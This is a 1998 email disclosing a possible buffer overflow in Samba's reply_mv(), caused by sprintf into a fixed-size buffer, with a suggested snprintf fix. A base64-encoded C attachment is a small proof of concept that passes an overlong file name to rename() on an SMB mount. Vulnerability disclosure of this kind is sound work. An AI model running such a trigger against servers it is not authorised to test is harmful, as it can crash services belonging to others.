X-RDate: Tue, 12 May 1998 11:57:58 +0600 (YEKST)
X-UIDL: 35317d3400000229
Date: Sun, 10 May 1998 12:43:32 -0400
From: Drago <[email protected]>
To: [email protected]Subject: Samba problems
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to [email protected] for more info.
--8323328-1713499422-894818612=:5136
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello,
While browsing the samba sources a while ago I noticed a problems in a few
areas of the reply handling to file requests. I just took a look at the
latest source code (samba-1.9.18p5) and found the same problems that I
saw in the previous release. A possible buffer overflow exists in many
area's of the code.
smb.h:typedef char pstring[1024];
reply.c - reply_mv(char *inbuf,char *outbuf,int dum_size, int dum_buffsize):3066
...
3200: pstring fname;
...
* 3206: sprintf(fname,"%s/%s",directory,dname);
..
I have seen alot of issues about strcpy() and how strncpy() should be used
instead. Very few times have I seen anything about sprintf()/snprintf()
which also has the same issues that people have with strcpy() as far as
buffer overflows go. An easy fix for this is to simply change line 3206
to use snprintf(). In many other area's of reply.c are the same problems
that are in reply_mv (reply_unlink(), and a few others).
I would recommend that you kill samba until a patch is released or patch
it yourself if you know how rewrite it correctly.
Someone feel free to try this against a windows machine, I haven't had a
chance to try it. The program I included can be used to test a mounted
samba fs.
Later.
[email protected]
--8323328-1713499422-894818612=:5136
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="popsmb.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
LyogQnkgRHJhZ28gKERyYWdvQERyYWdvLmNvbSkgKi8NCi8qIFJ1biB0aGlz
IGluIGEgc21iIG1vdW50ZWQgZGlyZWN0b3J5IHRvIHRlc3QgaWYgdGhlIHN5
c3RlbSAqLw0KLyogaXMgdnVsbmVyYWJsZSBpbiByZXBseV9tdiAqLw0KDQoj
aW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3RkaW8uaD4NCg0KaW50
IG1haW4odm9pZCkgew0KICAgIGNoYXIgYnVmWzIwNDhdOw0KICAgIGludCBp
PTA7DQogICAgd2hpbGUgKGk8MjA0OCkgYnVmW2krK109J0YnOw0KICAgIGJ1
ZltpXT0wOw0KICAgIHJlbmFtZShidWYsIGJ1Zik7DQogICAgcmV0dXJuIDA7
DQp9DQo=
--8323328-1713499422-894818612=:5136--
